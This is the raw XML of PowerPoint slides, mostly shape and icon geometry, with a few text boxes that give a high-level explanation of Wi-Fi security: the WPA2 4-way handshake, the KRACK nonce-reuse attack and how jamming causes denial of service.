                  <a:cubicBezTo>
                    <a:pt x="408" y="275"/>
                    <a:pt x="496" y="151"/>
                    <a:pt x="496" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="115"/>
                    <a:pt x="408" y="0"/>
                    <a:pt x="249" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="249" y="239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="249" y="239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="239"/>
                    <a:pt x="142" y="195"/>
                    <a:pt x="142" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="79"/>
                    <a:pt x="186" y="26"/>
                    <a:pt x="249" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="26"/>
                    <a:pt x="355" y="79"/>
                    <a:pt x="355" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="195"/>
                    <a:pt x="310" y="239"/>
                    <a:pt x="249" y="239"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="249" y="133"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="249" y="133"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="123"/>
                    <a:pt x="266" y="79"/>
                    <a:pt x="249" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="79"/>
                    <a:pt x="195" y="107"/>
                    <a:pt x="195" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="168"/>
                    <a:pt x="221" y="186"/>
                    <a:pt x="249" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="186"/>
                    <a:pt x="302" y="168"/>
                    <a:pt x="302" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="123"/>
                    <a:pt x="257" y="142"/>
                    <a:pt x="249" y="13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endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p: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98154AA1-254D-42DD-9535-44320DC4CA6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150176" y="5147568"/>
            <a:ext cx="584445" cy="584445"/>
            <a:chOff x="3322001" y="5147568"/>
            <a:chExt cx="584445" cy="584445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="99" name="Oval 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C73E6F-8A51-48F6-87D2-00C7BD8DB657}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3322001" y="5147568"/>
              <a:ext cx="584445" cy="58444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" name="Freeform 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B8F946-E583-4F4D-B5E4-05571B7F4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1899" y="5277068"/>
              <a:ext cx="184649" cy="325445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126553 w 284"/>
                <a:gd name="T1" fmla="*/ 51794 h 497"/>
                <a:gd name="T2" fmla="*/ 126553 w 284"/>
                <a:gd name="T3" fmla="*/ 51794 h 497"/>
                <a:gd name="T4" fmla="*/ 126553 w 284"/>
                <a:gd name="T5" fmla="*/ 27923 h 497"/>
                <a:gd name="T6" fmla="*/ 63500 w 284"/>
                <a:gd name="T7" fmla="*/ 0 h 497"/>
                <a:gd name="T8" fmla="*/ 0 w 284"/>
                <a:gd name="T9" fmla="*/ 27923 h 497"/>
                <a:gd name="T10" fmla="*/ 0 w 284"/>
                <a:gd name="T11" fmla="*/ 51794 h 497"/>
                <a:gd name="T12" fmla="*/ 43377 w 284"/>
                <a:gd name="T13" fmla="*/ 111694 h 497"/>
                <a:gd name="T14" fmla="*/ 0 w 284"/>
                <a:gd name="T15" fmla="*/ 171594 h 497"/>
                <a:gd name="T16" fmla="*/ 0 w 284"/>
                <a:gd name="T17" fmla="*/ 199518 h 497"/>
                <a:gd name="T18" fmla="*/ 63500 w 284"/>
                <a:gd name="T19" fmla="*/ 223388 h 497"/>
                <a:gd name="T20" fmla="*/ 126553 w 284"/>
                <a:gd name="T21" fmla="*/ 199518 h 497"/>
                <a:gd name="T22" fmla="*/ 126553 w 284"/>
                <a:gd name="T23" fmla="*/ 171594 h 497"/>
                <a:gd name="T24" fmla="*/ 83176 w 284"/>
                <a:gd name="T25" fmla="*/ 111694 h 497"/>
                <a:gd name="T26" fmla="*/ 126553 w 284"/>
                <a:gd name="T27" fmla="*/ 51794 h 497"/>
                <a:gd name="T28" fmla="*/ 19676 w 284"/>
                <a:gd name="T29" fmla="*/ 27923 h 497"/>
                <a:gd name="T30" fmla="*/ 19676 w 284"/>
                <a:gd name="T31" fmla="*/ 27923 h 497"/>
                <a:gd name="T32" fmla="*/ 63500 w 284"/>
                <a:gd name="T33" fmla="*/ 15763 h 497"/>
                <a:gd name="T34" fmla="*/ 106877 w 284"/>
                <a:gd name="T35" fmla="*/ 27923 h 497"/>
                <a:gd name="T36" fmla="*/ 110901 w 284"/>
                <a:gd name="T37" fmla="*/ 31977 h 497"/>
                <a:gd name="T38" fmla="*/ 63500 w 284"/>
                <a:gd name="T39" fmla="*/ 43687 h 497"/>
                <a:gd name="T40" fmla="*/ 15651 w 284"/>
                <a:gd name="T41" fmla="*/ 31977 h 497"/>
                <a:gd name="T42" fmla="*/ 19676 w 284"/>
                <a:gd name="T43" fmla="*/ 27923 h 497"/>
                <a:gd name="T44" fmla="*/ 67525 w 284"/>
                <a:gd name="T45" fmla="*/ 111694 h 497"/>
                <a:gd name="T46" fmla="*/ 67525 w 284"/>
                <a:gd name="T47" fmla="*/ 111694 h 497"/>
                <a:gd name="T48" fmla="*/ 91225 w 284"/>
                <a:gd name="T49" fmla="*/ 147724 h 497"/>
                <a:gd name="T50" fmla="*/ 110901 w 284"/>
                <a:gd name="T51" fmla="*/ 171594 h 497"/>
                <a:gd name="T52" fmla="*/ 110901 w 284"/>
                <a:gd name="T53" fmla="*/ 187357 h 497"/>
                <a:gd name="T54" fmla="*/ 67525 w 284"/>
                <a:gd name="T55" fmla="*/ 159434 h 497"/>
                <a:gd name="T56" fmla="*/ 59475 w 284"/>
                <a:gd name="T57" fmla="*/ 159434 h 497"/>
                <a:gd name="T58" fmla="*/ 15651 w 284"/>
                <a:gd name="T59" fmla="*/ 187357 h 497"/>
                <a:gd name="T60" fmla="*/ 15651 w 284"/>
                <a:gd name="T61" fmla="*/ 171594 h 497"/>
                <a:gd name="T62" fmla="*/ 35775 w 284"/>
                <a:gd name="T63" fmla="*/ 147724 h 497"/>
                <a:gd name="T64" fmla="*/ 59475 w 284"/>
                <a:gd name="T65" fmla="*/ 111694 h 497"/>
                <a:gd name="T66" fmla="*/ 35775 w 284"/>
                <a:gd name="T67" fmla="*/ 79717 h 497"/>
                <a:gd name="T68" fmla="*/ 15651 w 284"/>
                <a:gd name="T69" fmla="*/ 51794 h 497"/>
                <a:gd name="T70" fmla="*/ 15651 w 284"/>
                <a:gd name="T71" fmla="*/ 39633 h 497"/>
                <a:gd name="T72" fmla="*/ 63500 w 284"/>
                <a:gd name="T73" fmla="*/ 51794 h 497"/>
                <a:gd name="T74" fmla="*/ 110901 w 284"/>
                <a:gd name="T75" fmla="*/ 39633 h 497"/>
                <a:gd name="T76" fmla="*/ 110901 w 284"/>
                <a:gd name="T77" fmla="*/ 51794 h 497"/>
                <a:gd name="T78" fmla="*/ 91225 w 284"/>
                <a:gd name="T79" fmla="*/ 79717 h 497"/>
                <a:gd name="T80" fmla="*/ 67525 w 284"/>
                <a:gd name="T81" fmla="*/ 111694 h 49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84" h="497">
                  <a:moveTo>
                    <a:pt x="283" y="115"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="283" y="115"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="62"/>
                    <a:pt x="283" y="62"/>
                    <a:pt x="283" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="35"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="0"/>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="168"/>
                    <a:pt x="97" y="213"/>
                    <a:pt x="97" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="292"/>
                    <a:pt x="0" y="328"/>
                    <a:pt x="0" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="434"/>
                    <a:pt x="0" y="443"/>
                    <a:pt x="0" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="460"/>
                    <a:pt x="61" y="496"/>
                    <a:pt x="142" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="496"/>
                    <a:pt x="283" y="460"/>
                    <a:pt x="283" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="443"/>
                    <a:pt x="283" y="434"/>
                    <a:pt x="283" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="328"/>
                    <a:pt x="186" y="292"/>
                    <a:pt x="186" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="213"/>
                    <a:pt x="283" y="168"/>
                    <a:pt x="283" y="115"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="44" y="62"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="53"/>
                    <a:pt x="88" y="35"/>
                    <a:pt x="142" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="35"/>
                    <a:pt x="239" y="62"/>
                    <a:pt x="239" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="62"/>
                    <a:pt x="257" y="71"/>
                    <a:pt x="248" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="88"/>
                    <a:pt x="186" y="97"/>
                    <a:pt x="142" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="97"/>
                    <a:pt x="53" y="88"/>
                    <a:pt x="35" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="71"/>
                    <a:pt x="44" y="62"/>
                    <a:pt x="44" y="62"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151" y="248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151" y="248"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="283"/>
                    <a:pt x="177" y="301"/>
                    <a:pt x="204" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="345"/>
                    <a:pt x="248" y="372"/>
                    <a:pt x="248" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="416"/>
                    <a:pt x="248" y="416"/>
                    <a:pt x="248" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="407"/>
                    <a:pt x="151" y="390"/>
                    <a:pt x="151" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="337"/>
                    <a:pt x="133" y="337"/>
                    <a:pt x="133" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="390"/>
                    <a:pt x="61" y="407"/>
                    <a:pt x="35" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="381"/>
                    <a:pt x="35" y="381"/>
                    <a:pt x="35" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="372"/>
                    <a:pt x="61" y="345"/>
                    <a:pt x="80" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="301"/>
                    <a:pt x="133" y="283"/>
                    <a:pt x="133" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="222"/>
                    <a:pt x="106" y="203"/>
                    <a:pt x="80" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="159"/>
                    <a:pt x="35" y="132"/>
                    <a:pt x="35" y="115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61" y="106"/>
                    <a:pt x="97" y="115"/>
                    <a:pt x="142" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="115"/>
                    <a:pt x="230" y="106"/>
                    <a:pt x="248" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="115"/>
                    <a:pt x="248" y="115"/>
                    <a:pt x="248" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="132"/>
                    <a:pt x="221" y="159"/>
                    <a:pt x="204" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="203"/>
                    <a:pt x="151" y="222"/>
                    <a:pt x="151" y="2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endParaRPr lang="en-US"/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DA763B3D-BCB4-4A33-9CA6-1F44CB4F2CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="153218" y="1863421"/>
            <a:ext cx="584445" cy="584445"/>
            <a:chOff x="3325043" y="1861040"/>
            <a:chExt cx="584445" cy="584445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="Oval 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4444E41B-ED79-461C-9245-B52231C71DBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3325043" y="1861040"/>
              <a:ext cx="584445" cy="584445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Freeform 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEF52C2C-8F31-49A9-B72E-48100BB38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546" y="2002081"/>
              <a:ext cx="295439" cy="302362"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123628 w 452"/>
                <a:gd name="T1" fmla="*/ 135490 h 462"/>
                <a:gd name="T2" fmla="*/ 123628 w 452"/>
                <a:gd name="T3" fmla="*/ 135490 h 462"/>
                <a:gd name="T4" fmla="*/ 195108 w 452"/>
                <a:gd name="T5" fmla="*/ 11703 h 462"/>
                <a:gd name="T6" fmla="*/ 195108 w 452"/>
                <a:gd name="T7" fmla="*/ 8102 h 462"/>
                <a:gd name="T8" fmla="*/ 191062 w 452"/>
                <a:gd name="T9" fmla="*/ 8102 h 462"/>
                <a:gd name="T10" fmla="*/ 71480 w 452"/>
                <a:gd name="T11" fmla="*/ 80124 h 462"/>
                <a:gd name="T12" fmla="*/ 4046 w 452"/>
                <a:gd name="T13" fmla="*/ 135490 h 462"/>
                <a:gd name="T14" fmla="*/ 15735 w 452"/>
                <a:gd name="T15" fmla="*/ 147644 h 462"/>
                <a:gd name="T16" fmla="*/ 39561 w 452"/>
                <a:gd name="T17" fmla="*/ 139542 h 462"/>
                <a:gd name="T18" fmla="*/ 67883 w 452"/>
                <a:gd name="T19" fmla="*/ 167450 h 462"/>
                <a:gd name="T20" fmla="*/ 59791 w 452"/>
                <a:gd name="T21" fmla="*/ 191307 h 462"/>
                <a:gd name="T22" fmla="*/ 67883 w 452"/>
                <a:gd name="T23" fmla="*/ 203461 h 462"/>
                <a:gd name="T24" fmla="*/ 123628 w 452"/>
                <a:gd name="T25" fmla="*/ 135490 h 462"/>
                <a:gd name="T26" fmla="*/ 135317 w 452"/>
                <a:gd name="T27" fmla="*/ 67520 h 462"/>
                <a:gd name="T28" fmla="*/ 135317 w 452"/>
                <a:gd name="T29" fmla="*/ 67520 h 462"/>
                <a:gd name="T30" fmla="*/ 135317 w 452"/>
                <a:gd name="T31" fmla="*/ 43663 h 462"/>
                <a:gd name="T32" fmla="*/ 159143 w 452"/>
                <a:gd name="T33" fmla="*/ 43663 h 462"/>
                <a:gd name="T34" fmla="*/ 159143 w 452"/>
                <a:gd name="T35" fmla="*/ 67520 h 462"/>
                <a:gd name="T36" fmla="*/ 135317 w 452"/>
                <a:gd name="T37" fmla="*/ 67520 h 4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2" h="462">
                  <a:moveTo>
                    <a:pt x="275" y="301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="275" y="301"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="301"/>
                    <a:pt x="451" y="169"/>
                    <a:pt x="434" y="26"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="434" y="18"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="18"/>
                    <a:pt x="425" y="18"/>
                    <a:pt x="425" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="0"/>
                    <a:pt x="159" y="178"/>
                    <a:pt x="159" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="159"/>
                    <a:pt x="62" y="186"/>
                    <a:pt x="9" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="328"/>
                    <a:pt x="18" y="328"/>
                    <a:pt x="35" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="319"/>
                    <a:pt x="88" y="310"/>
                    <a:pt x="88" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="372"/>
                    <a:pt x="151" y="372"/>
                    <a:pt x="151" y="372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="372"/>
                    <a:pt x="141" y="407"/>
                    <a:pt x="133" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="443"/>
                    <a:pt x="133" y="461"/>
                    <a:pt x="151" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="398"/>
                    <a:pt x="292" y="407"/>
                    <a:pt x="275" y="301"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="301" y="150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="301" y="150"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="133"/>
                    <a:pt x="284" y="115"/>
                    <a:pt x="301" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="80"/>
                    <a:pt x="345" y="80"/>
                    <a:pt x="354" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="115"/>
                    <a:pt x="372" y="133"/>
                    <a:pt x="354" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="169"/>
                    <a:pt x="319" y="169"/>
                    <a:pt x="301" y="15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endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Rectangle 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F271E42E-BED1-4F64-B6AF-0FB847C9CD48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855281" y="1614652"/>
            <a:ext cx="4354894" cy="107721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 defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1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All secure Wi-Fi networks use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</a:t>
            </a:r>
            <a:b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</a:b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4-way handshake process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to join the network and generate a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fresh encryption key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that will be used to encrypt the network traffic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DCE22AE1-CB66-42EC-89DA-D5EB397FB075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855280" y="3381028"/>
            <a:ext cx="4277591" cy="83099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KRACK attack works by exploiting the 4-way handshake of the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WPA2 protocol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by forcing Nonce reuse</a:t>
            </a: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9784F9CE-4560-4CB6-ABB8-D118ADDD4B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855281" y="4905493"/>
            <a:ext cx="4353332" cy="107721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KRACK works against all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modern protected Wi-Fi networks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and allows attackers to steal sensitive information, such as credit card numbers, passwords, chat messages, emails, and photos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324733916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27435A51-EB3D-45D1-83E4-E3A608F08C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1000579"/>
            <a:ext cx="3657640" cy="5568766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186D53D0-E778-4269-90F4-086E9C9EA44E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657640" y="3656"/>
            <a:ext cx="8534360" cy="975613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AB86FF35-B2B2-41EB-9ECC-89C1F1EC5873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143082" y="168297"/>
            <a:ext cx="5563477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Jamming Signal Attack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D9AAC981-2EC2-40FE-9EF3-85F7EAD43CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741694" y="1329473"/>
            <a:ext cx="2758466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All wireless networks are prone to jamming</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="8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8" name="Rectangle 177">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6489B5AB-0591-4C16-9E72-52B1E678558F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737278" y="2366367"/>
            <a:ext cx="2758466" cy="203132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This jamming signal causes a DoS because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802.11 is a CSMA/CA protocol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whose collision avoidance algorithms require a period of silence before a radio is allowed to transmit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0EBF395-3628-4116-BF55-7179B83C2229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="128202" y="1329473"/>
            <a:ext cx="512328" cy="512328"/>
            <a:chOff x="145781" y="1315228"/>
            <a:chExt cx="512328" cy="512328"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="176" name="Oval 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{618D0949-0F5F-4907-BA42-CC58600EAC0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="145781" y="1315228"/>
              <a:ext cx="512328" cy="512328"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln w="38100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1" name="Freeform 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC617FA9-D816-4D59-8AD6-1D13D643DF0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8537" y="1422778"/>
              <a:ext cx="306816" cy="297228"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72822069 w 566"/>
                <a:gd name="T1" fmla="*/ 67317282 h 545"/>
                <a:gd name="T2" fmla="*/ 72822069 w 566"/>
                <a:gd name="T3" fmla="*/ 67317282 h 545"/>
                <a:gd name="T4" fmla="*/ 69213295 w 566"/>
                <a:gd name="T5" fmla="*/ 70970385 h 545"/>
                <a:gd name="T6" fmla="*/ 66506355 w 566"/>
                <a:gd name="T7" fmla="*/ 70970385 h 545"/>
                <a:gd name="T8" fmla="*/ 66506355 w 566"/>
                <a:gd name="T9" fmla="*/ 70970385 h 545"/>
                <a:gd name="T10" fmla="*/ 49106547 w 566"/>
                <a:gd name="T11" fmla="*/ 57141401 h 545"/>
                <a:gd name="T12" fmla="*/ 24617716 w 566"/>
                <a:gd name="T13" fmla="*/ 70970385 h 545"/>
                <a:gd name="T14" fmla="*/ 24617716 w 566"/>
                <a:gd name="T15" fmla="*/ 70970385 h 545"/>
                <a:gd name="T16" fmla="*/ 22684444 w 566"/>
                <a:gd name="T17" fmla="*/ 70970385 h 545"/>
                <a:gd name="T18" fmla="*/ 20880057 w 566"/>
                <a:gd name="T19" fmla="*/ 70970385 h 545"/>
                <a:gd name="T20" fmla="*/ 902194 w 566"/>
                <a:gd name="T21" fmla="*/ 56228306 h 545"/>
                <a:gd name="T22" fmla="*/ 0 w 566"/>
                <a:gd name="T23" fmla="*/ 52444813 h 545"/>
                <a:gd name="T24" fmla="*/ 0 w 566"/>
                <a:gd name="T25" fmla="*/ 3652741 h 545"/>
                <a:gd name="T26" fmla="*/ 3608775 w 566"/>
                <a:gd name="T27" fmla="*/ 0 h 545"/>
                <a:gd name="T28" fmla="*/ 5413162 w 566"/>
                <a:gd name="T29" fmla="*/ 913095 h 545"/>
                <a:gd name="T30" fmla="*/ 5413162 w 566"/>
                <a:gd name="T31" fmla="*/ 913095 h 545"/>
                <a:gd name="T32" fmla="*/ 22684444 w 566"/>
                <a:gd name="T33" fmla="*/ 13828622 h 545"/>
                <a:gd name="T34" fmla="*/ 48204353 w 566"/>
                <a:gd name="T35" fmla="*/ 0 h 545"/>
                <a:gd name="T36" fmla="*/ 48204353 w 566"/>
                <a:gd name="T37" fmla="*/ 0 h 545"/>
                <a:gd name="T38" fmla="*/ 49106547 w 566"/>
                <a:gd name="T39" fmla="*/ 0 h 545"/>
                <a:gd name="T40" fmla="*/ 51942013 w 566"/>
                <a:gd name="T41" fmla="*/ 913095 h 545"/>
                <a:gd name="T42" fmla="*/ 51942013 w 566"/>
                <a:gd name="T43" fmla="*/ 913095 h 545"/>
                <a:gd name="T44" fmla="*/ 71017682 w 566"/>
                <a:gd name="T45" fmla="*/ 15655173 h 545"/>
                <a:gd name="T46" fmla="*/ 71017682 w 566"/>
                <a:gd name="T47" fmla="*/ 15655173 h 545"/>
                <a:gd name="T48" fmla="*/ 71017682 w 566"/>
                <a:gd name="T49" fmla="*/ 15655173 h 545"/>
                <a:gd name="T50" fmla="*/ 71017682 w 566"/>
                <a:gd name="T51" fmla="*/ 15655173 h 545"/>
                <a:gd name="T52" fmla="*/ 72822069 w 566"/>
                <a:gd name="T53" fmla="*/ 18394820 h 545"/>
                <a:gd name="T54" fmla="*/ 72822069 w 566"/>
